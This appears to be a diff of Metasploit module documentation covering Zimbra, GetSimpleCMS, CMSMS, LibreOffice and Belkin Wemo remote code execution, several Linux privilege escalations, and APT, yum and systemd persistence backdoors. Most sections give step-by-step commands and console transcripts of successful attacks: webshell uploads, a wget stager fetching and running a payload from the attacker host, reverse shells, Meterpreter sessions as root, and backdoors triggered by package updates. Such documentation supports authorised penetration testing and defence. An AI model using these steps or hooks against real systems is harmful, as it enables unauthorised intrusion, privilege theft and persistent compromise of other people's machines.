+This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the ClientUploader is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
+
+## Vulnerable Application
+
+Zimbra Collaboration Suite v8.5 to v8.7.11.
+
+[Zimbra 8.7.1 GA FOSS Edition](https://files.zimbra.com/downloads/8.7.1_GA/zcs-8.7.1_GA_1670.UBUNTU16_64.20161025045114.tgz)
+
+[Installation](https://zimbra.github.io/installguides/latest/single.html#Installing_Zimbra_Collaboration_Software)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use exploit/linux/http/zimbra_xxe_rce`
+3. `set rhosts <rhost>`
+4. `set lhost <lhost>`
+5. `exploit`
+
+## Scenarios
+
+### Zimbra 8.7.1 GA 1670 FOSS edition Tested on Ubuntu 16.04.6 LTS
+
+```
+msf5 exploit(linux/http/zimbra_xxe_rce) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Using URL: http://0.0.0.0:8080/2tQ75DxRvaeGRSP
+[*] Local IP: http://192.168.171.150:8080/2tQ75DxRvaeGRSP
+[*] Server started.
+[+] Password found: Syz7fOPJI
+[+] User cookie retrieved: ZM_AUTH_TOKEN=0_c6df3ed73afbefd7eff40eb9f6999794ebf764b5_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343239343539303239353b747970653d363a7a696d6272613b753d313a613b7469643d393a3538303338373138373b;
+[+] Admin cookie retrieved: ZM_ADMIN_AUTH_TOKEN=0_c1c8a6c715eb8f55c14aa63e82a8ff64e4fbe279_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343136343939303333353b61646d696e3d313a313b747970653d363a7a696d6272613b753d313a613b7469643d383a36303437383736333b;
+[*] Uploading jsp shell
+[*] Executing payload on /downloads/XFlHBolHjLB.jsp
+[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.111:53746) at 2019-04-01 07:29:51 -0500
+[*] Server stopped.
+
+whoami
+zimbra
+uname -a
+Linux zimbra.mylocaldomain.local 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+../bin/zmcontrol -v
+Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
+exit
+[*] 172.22.222.111 - Command shell session 1 closed.
+```
@@ -1,19 +1,25 @@
 ## Description

-  This module attempts to gain root privileges on Fedora systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler.
+  This module attempts to gain root privileges on Linux systems with
+  a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
+  as the crash handler.


 ## Vulnerable Application

-  A race condition in ABRT allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes.
+  A race condition allows local users to change ownership of arbitrary
+  files (CVE-2015-3315). This module uses a symlink attack on
+  `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,
+  then adds a new user with UID=0 GID=0 to gain root privileges.
+  Winning the race could take a few minutes.

-  This module has been tested successfully on ABRT packaged versions:
+  This module has been tested successfully on:

-  * 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
-  * 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
-  * 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
-
-  Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.
+  * abrt 2.1.11-12.el7 on RHEL 7.0 x86_64
+  * abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
+  * abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
+  * abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
+  * abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64


 ## Verification Steps
@@ -0,0 +1,66 @@
+## Description
+
+This module will run a payload when the package manager is used. No
+handler is ran automatically so you must configure an appropriate
+exploit/multi/handler to connect. This module creates a pre-invoke hook
+for APT in apt.conf.d. The hook name syntax is numeric followed by text.
+
+## Verification Steps
+
+1. Exploit a box that uses APT
+2. `use linux/local/apt_package_manager_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+5. `exploit`
+
+When the system runs apt-get update the payload will launch.  You must set handler accordingly.
+
+## Options
+
+**BACKDOOR_NAME**
+
+Name of backdoor executable
+
+**HOOKNAME**
+
+Name of pre-invoke hook to be installed in /etc/apt/apt.conf.d/. Pre-invoke hook name syntax is numeric followed by text.
+
+**WritableDir**
+
+Writable directory for backdoor default is (/usr/local/bin/)
+
+## Scenarios
+
+### Tested on Ubuntu 18.04.2 LTS
+
+```
+msf5 > use exploit/linux/local/apt_package_manager_persistence
+msf5 exploit(linux/local/apt_package_manager_persistence) > handler -p linux/x86/meterpreter/reverse_tcp -H 172.22.222.136 -P 4444
+[*] Payload handler running as background job 0.
+msf5 exploit(linux/local/apt_package_manager_persistence) > 
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Sending stage (985320 bytes) to 172.22.222.130
+[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.130:60526) at 2019-04-26 13:04:33 -0500
+
+msf5 exploit(linux/local/apt_package_manager_persistence) > set session 1
+session => 1
+msf5 exploit(linux/local/apt_package_manager_persistence) > set payload linux/x86/meterpreter/reverse_tcp 
+payload => linux/x86/meterpreter/reverse_tcp
+msf5 exploit(linux/local/apt_package_manager_persistence) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
+msf5 exploit(linux/local/apt_package_manager_persistence) > set lport 4444
+lport => 4444
+msf5 exploit(linux/local/apt_package_manager_persistence) > exploit
+
+[*] Attempting to write hook:
+[*] Wrote /etc/apt/apt.conf.d/34bmUIzfd
+[*] Backdoor uploaded /usr/local/bin/dbmqKeh6U9
+[*] Backdoor will run on next APT update
+msf5 exploit(linux/local/apt_package_manager_persistence) > 
+[*] Sending stage (985320 bytes) to 172.22.222.130
+[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.130:60528) at 2019-04-26 13:05:17 -0500
+
+msf5 exploit(linux/local/apt_package_manager_persistence) >
+```
+
+Note: Second session comes in after running `apt update` on the remote host
@@ -25,6 +25,7 @@
  * Ubuntu 14.04.1 kernel 4.4.0-89-generic;
  * Ubuntu 16.04.2 kernel 4.8.0-45-generic;
  * Ubuntu 16.04.3 kernel 4.10.0-28-generic;
+  * Ubuntu 16.04.5 kernel 4.4.0-116-generic;
  * Ubuntu 17.04 kernel 4.10.0-19-generic;
  * ZorinOS 12.1 kernel 4.8.0-39-generic.

@@ -1,25 +1,33 @@
 ## Description

-  This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker - aka glibc `$ORIGIN` expansion vulnerability.
+  This module attempts to gain root privileges on Linux systems by abusing
+  a vulnerability in the GNU C Library (glibc) dynamic linker.


 ## Vulnerable Application

-  glibc `ld.so` in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the `LD_AUDIT` environment variable when loading setuid executables. This allows control over the `$ORIGIN` library search path resulting in execution of arbitrary shared objects.
+  glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not
+  properly restrict use of the `LD_AUDIT` environment variable when loading
+  setuid executables which allows control over the `$ORIGIN` library search
+  path resulting in execution of arbitrary shared objects.

-  This module opens a file descriptor to the specified suid executable via a hard link, then replaces the hard link with a shared object before instructing the linker to execute the file descriptor, resulting in arbitrary code execution.
+  This module opens a file descriptor to the specified suid executable via
+  a hard link, then replaces the hard link with a shared object before
+  instructing the linker to execute the file descriptor, resulting in
+  arbitrary code execution.

-  The specified setuid binary must be readable and located on the same file system partition as the specified writable directory.
+  The specified setuid binary must be readable and located on the same
+  file system partition as the specified writable directory.

  This module has been tested successfully on:

  * glibc 2.5 on CentOS 5.4 (x86_64)
  * glibc 2.5 on CentOS 5.5 (x86_64)
-  * glibc 2.12 on Fedora 13 (i386, x86_64)
+  * glibc 2.12 on Fedora 13 (i386)
+  * glibc 2.5-49 on RHEL 5.5 (x86_64)

-  RHEL 5 is reportedly affected, but untested.
-
-  Some versions of `ld.so`, such as the version shipped with Ubuntu 14, hit a failed assertion in `dl_open_worker` causing exploitation to fail.
+  Some versions of `ld.so`, such as the version shipped with Ubuntu 14,
+  hit a failed assertion in `dl_open_worker` causing exploitation to fail.


 ## Verification Steps
@@ -5,9 +5,10 @@
 1. Kali 2.0 (System V)
 2. Ubuntu 14.04 (Upstart)
 3. Ubuntu 16.04 (systemd)
-4. Centos 5 (System V)
-5. Fedora 18 (systemd)
-6. Fedora 20 (systemd)
+4. Ubuntu 16.04 (systemd user)
+5. Centos 5 (System V)
+6. Fedora 18 (systemd)
+7. Fedora 20 (systemd)

 ## Verification Steps

@@ -36,7 +37,7 @@
 0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries
 1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot).  This logs to syslog or /var/log/<process>.log and .err
 2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
-3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever.
+3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.

 **SHELLPATH**
  
@@ -252,3 +253,53 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
    [*] Started reverse handler on 192.168.199.128:4444 
    [*] Starting the payload handler...
    [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
+
+### systemd user (Ubuntu 16.04 Server - vagrant)
+
+    msf5 exploit(linux/local/service_persistence) > options
+
+    Module options (exploit/linux/local/service_persistence):
+
+       Name        Current Setting  Required  Description
+       ----        ---------------  --------  -----------
+       SERVICE                      no        Name of service to create
+       SESSION     -1               yes       The session to run this module on.
+       SHELLPATH   /tmp             yes       Writable path to put our shell
+       SHELL_NAME                   no        Name of shell file to write
+
+
+    Payload options (cmd/unix/reverse_netcat):
+
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+
+
+    Exploit target:
+
+       Id  Name
+       --  ----
+       4   systemd user
+
+
+    msf5 exploit(linux/local/service_persistence) > run
+
+    [!] SESSION may not be compatible with this module.
+    [*] Started reverse TCP handler on 172.28.128.1:4444
+    [*] Writing backdoor to /tmp/PPpCF
+    [*] Max line length is 65537
+    [*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
+    [*] Creating user service directory
+    [*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
+    [*] Max line length is 65537
+    [*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
+    [*] Reloading manager configuration
+    [*] Enabling service
+    [*] Starting service: OzzdRBC
+    [*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600
+
+    id
+    uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
+    uname -a
+    Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
@@ -0,0 +1,114 @@
+## Description
+
+  This module attempts to gain root privileges by exploiting a
+  vulnerability in the `staprun` executable included with SystemTap
+  version 1.3.
+
+  The `staprun` executable does not clear environment variables prior to
+  executing `modprobe`, allowing an arbitrary configuration file to be
+  specified in the `MODPROBE_OPTIONS` environment variable, resulting
+  in arbitrary command execution with root privileges.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * systemtap 1.2-1.fc13-i686 on Fedora 13 (i686)
+  * systemtap 1.1-3.el5 on RHEL 5.5 (x64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/systemtap_modprobe_options_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **STAPRUN_PATH**
+
+  Path to staprun executable (default: `/usr/bin/staprun`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### Red Hat Enterprise Linux 5.5 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
+  
+  [*] Started reverse TCP handler on 172.16.191.165:4444
+  [+] /usr/bin/staprun is executable
+  [+] /usr/bin/staprun is setuid
+  [*] Writing '/tmp/.rX9IoM53YEb92' (207 bytes) ...
+  [*] Writing '/tmp/.rX9IoM53YEb92.conf' (23 bytes) ...
+  [*] Executing payload...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.202
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.202:52074) at 2019-04-18 12:50:56 -0400
+  [+] Deleted /tmp/.rX9IoM53YEb92
+  [+] Deleted /tmp/.rX9IoM53YEb92.conf
+  ERROR: Unable to canonicalize path "/lib/modules/2.6.18-194.el5/systemtap/As5A2hFpvQ2L.ko": No such file or directory
+  Retrying, after attempted removal of module As5A2hFpvQ2L (rc -1)
+  ERROR: Unable to canonicalize path "/lib/modules/2.6.18-194.el5/systemtap/As5A2hFpvQ2L.ko": No such file or directory
+  
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo 
+  Computer     : localhost.localdomain
+  OS           : Red Hat Enterprise Linux 5 (Linux 2.6.18-194.el5)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+
+### Fedora 13 (x86)
+
+  ```
+  msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444
+  [+] /usr/bin/staprun is executable
+  [+] /usr/bin/staprun is setuid
+  [*] Writing '/tmp/.otCyN6cAa7aUo0v' (207 bytes) ...
+  [*] Writing '/tmp/.otCyN6cAa7aUo0v.conf' (23 bytes) ...
+  [*] Executing payload...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.138
+  ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
+  Retrying, after attempted removal of module l0rDp93O8f (rc -1)
+  ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.138:33541) at 2019-04-19 07:26:46 -0400
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : fedora13.localdomain
+  OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
+  Architecture : i686
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter >
+  ```
+
@@ -0,0 +1,84 @@
+## Description
+
+This module will run a payload when the package manager is used. No
+handler is ran automatically so you must configure an appropriate
+exploit/multi/handler to connect. Module modifies a yum plugin to
+launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/
+will show what plugins are currently enabled on the system.
+
+## Verification Steps
+
+1. Exploit a box that uses Yum 
+2. `use linux/local/yum_package_manager_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+5. `exploit`
+
+When the system runs yum update the payload will launch.  You must set handler accordingly.
+
+## Options
+
+**BACKDOOR_NAME**
+Name of backdoor executable
+ 
+**PLUGIN**
+Name of the yum plugin to target 
+  
+**WritableDir**
+Writable directory for backdoor default is (/usr/local/bin/)       
+
+**PluginPath**
+Plugin path to use default is (/usr/lib/yum-plugins/)
+
+## Scenarios
+
+### Tested on Fedora 21
+
+```
+msf5 exploit(linux/local/yum_package_manager_persistence) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type             Information  Connection
+  --  ----  ----             -----------  ----------
+  1         shell x86/linux               172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135)
+
+msf5 exploit(linux/local/yum_package_manager_persistence) > set session 1
+session => 1
+msf5 exploit(linux/local/yum_package_manager_persistence) > set plugin langpacks
+plugin => langpacks
+msf5 exploit(linux/local/yum_package_manager_persistence) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
+msf5 exploit(linux/local/yum_package_manager_persistence) > exploit
+
+[*] /usr/lib/yum-plugins/langpacks.py
+[+] Plugins are enabled!
+[*] Attempting to modify plugin
+[*] Backdoor uploaded to /usr/local/bin/z9fJTx2wVg
+[*] Backdoor will run on next Yum update
+msf5 exploit(linux/local/yum_package_manager_persistence) > [*] Command shell session 2 opened (172.22.222.136:4444 -> 172.22.222.135:43791) at 2019-04-30 06:21:12 -0500
+
+msf5 exploit(linux/local/yum_package_manager_persistence) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type             Information  Connection
+  --  ----  ----             -----------  ----------
+  1         shell x86/linux               172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135)
+  2         shell cmd/unix                172.22.222.136:4444 -> 172.22.222.135:43791 (172.22.222.135)
+
+msf5 exploit(linux/local/yum_package_manager_persistence) > sessions -i 2
+[*] Starting interaction with 2...
+
+id    
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux localhost.localdomain 3.17.4-301.fc21.x86_64 #1 SMP Thu Nov 27 19:09:10 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 172.22.222.135 - Command shell session 2 closed.
+msf5 exploit(linux/local/yum_package_manager_persistence) > 
+```
+
+Note: Session 2 is received after running yum update on the remote host.
@@ -0,0 +1,59 @@
+## Intro
+
+This module exploits a command injection in the Belkin Wemo UPnP API via
+the `SmartDevURL` argument to the `SetSmartDevInfo` action.
+
+This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
+devices are known to be affected, albeit on a different `RPORT` (49153).
+
+## Setup
+
+You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Unix In-Memory
+1   Linux Dropper
+```
+
+## Options
+
+**RPORT**
+
+Set this to the Wemo device's UPnP port. In our testing, this was 49152
+for Crock-Pot and 49153 for other devices.
+
+## Usage
+
+```
+msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
+
+[*] Started reverse TCP handler on 10.22.22.4:4444
+[+] Wemo-enabled device detected
+[*] Found firmware version: 2.00.6461
+[+] Firmware version 2.00.6461 < 2.00.8643
+[*] 10.22.22.1:49152 - The target appears to be vulnerable.
+[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
+[*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
+[*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
+[*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P
+[*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6
+[*] Sending payload to 10.22.22.1 (Wget)
+[*] Transmitting intermediate stager...(164 bytes)
+[*] Sending stage (1252312 bytes) to 10.22.22.1
+[*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : 10.22.22.1
+OS           :  (Linux 2.6.21)
+Architecture : mips
+BuildTuple   : mipsel-linux-muslsf
+Meterpreter  : mipsle/linux
+meterpreter >
+```
@@ -0,0 +1,98 @@
+## Description
+
+  This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.
+  Note: `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by
+  this module due to the lack of ability to pass arguments.
+
+  LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
+  to them. A macro can be tied to a program event by including the script that contains the macro and the function
+  name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the
+  Python script to be executed. This allows a program event to execute functions from Python scripts relative to the
+  path of the samples macros folder. The `pydoc.py` script included with LibreOffice contains the `tempfilepager` function
+  that passes arguments to `os.system`, allowing RCE.
+
+  This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.
+
+## Vulnerable Application
+
+  LibreOffice `v6.1.0-6.1.4.1`. Vulnerable versions for both Windows and Linux can be found [here](https://downloadarchive.documentfoundation.org/libreoffice/old/).
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/fileformat/libreoffice_macro_exec```
+  4. Do: ```set FILENAME <name>```
+  5. Do: ```set LHOST <ip>```
+  6. Do: ```set LPORT <port>```
+  7. Do: ```run```
+  8. Move the generated file to the target
+  9. Start a handler
+ 10. Open the file with a vulnerable version of LibreOffice
+ 11. You should get a shell.
+
+## Scenarios
+
+### Tested on LibreOffice 6.1.2.1 running Windows 7
+
+  ```
+  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec 
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
+
+  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [*] Sending stage (179779 bytes) to 192.168.37.156
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500
+
+  meterpreter > getuid
+  Server username: WIN-MGMN7ND70I1\a_user
+  meterpreter > sysinfo
+  Computer        : WIN-MGMN7ND70I1
+  OS              : Windows 7 (Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 1
+  Meterpreter     : x86/windows
+  ```
+
+### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1
+  target => 1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
+
+  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set LHOST 192.168.37.1
+  LHOST => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (985320 bytes) to 192.168.37.174
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.174:39912) at 2019-04-12 14:50:08 -0500
+
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : 192.168.37.174
+  OS           : Ubuntu 18.04 (Linux 4.18.0-16-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  ```
@@ -0,0 +1,48 @@
+## Description
+
+  This module exploits a vulnerability found in GetSimpleCMS, which
+  allows unauthenticated attackers to perform Remote Code Execution.
+  An arbitrary file upload vulnerability can be triggered by an
+  authenticated user, however authentication can be bypassed by leaking
+  the cms API key to target the session manager.
+
+## Vulnerable Application
+
+  GetSimple CMS versions 3.3.15 and below
+
+  Vulnerable installations can be found [here](http://get-simple.info/)
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/getsimplecms_unauth_code_exec```
+  4. Do: ```set RHOSTS <IP>```
+  4. Do: ```run```
+  5. You should get a shell.
+
+## Scenarios
+
+### Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/multi/http/getsimplecms_unauth_code_exec
+  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137
+  rhosts => 192.168.37.137
+  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true
+  verbose => true
+  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] GetSimpleCMS version 3315
+  [*] Sending stage (38247 bytes) to 192.168.37.137
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:32976) at 2019-05-16 11:22:39 -0500
+
+  meterpreter > getuid
+  Server username: www-data (33)
+  meterpreter > sysinfo
+  Computer    : ubuntu
+  OS          : Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64
+  Meterpreter : php/linux
+  meterpreter >
+  ```
@@ -0,0 +1,70 @@
+## Description
+
+This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with "Use Showtime2" privilege could exploit the vulnerability.
+
+The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).
+
+Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1 and 2.2.10
+
+## Vulnerable Application
+
+Affecting Showtime2 CMS Made Simple (CMSMS) module, version 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2
+
+## Verification Steps
+
+1. Setting up a working installation of CMS Made Simple (CMSMS)
+2. Download Showtime2 module (< 3.6.3)
+3. Log-in to admin panel with the administrator credentials
+4. Go in *site admin* => *Module Manager* and import the Showtime2 module
+5. Once the module is uploaded, click on *install* to install the module
+6. [OPTIONALLY] setting up a new user, assign it to a group and set the *Use Showtime2* permissions on group
+7. Start `msfconsole`
+8. `use exploit/multi/http/cmsms_showtime2_rce`
+9. `set RHOST <IP>`
+10. `set USERNAME <USERNAME>`
+11. `set PASSWORD <PASSWORD>`
+12. `check`
+13. You should see `The target appears to be vulnerable.`
+14. `exploit`
+15. You should get a meterpreter session!
+
+## Options
+
+* **TARGETURI**: Path to CMS Made Simple (CMSMS) App installation (“/” is the default)
+* **USERNAME**: Username to authenticate with
+* **PASSWORD**: Password to authenticate with
+
+## Scenario
+
+### Tested on Showtime 3.6.2 on CMS Made Simple (CMMS) 2.2.10
+
+```
+msf5 > use exploit/multi/http/cmsms_showtime2_rce 
+msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com
+rhost => target.com
+msf5 exploit(multi/http/cmsms_showtime2_rce) > check
+
+[*] Showtime2 version: 3.6.2
+[*] 192.168.2.59:80 - The target appears to be vulnerable.
+msf5 exploit(multi/http/cmsms_showtime2_rce) > set username Designer
+username => Designer
+msf5 exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r
+password => d3s1gn3r
+msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.8.2:4444 
+[*] Showtime2 version: 3.6.2
+[*] Uploading PHP payload.
+[*] Making request for '/06wp7Fen.php' to execute payload.
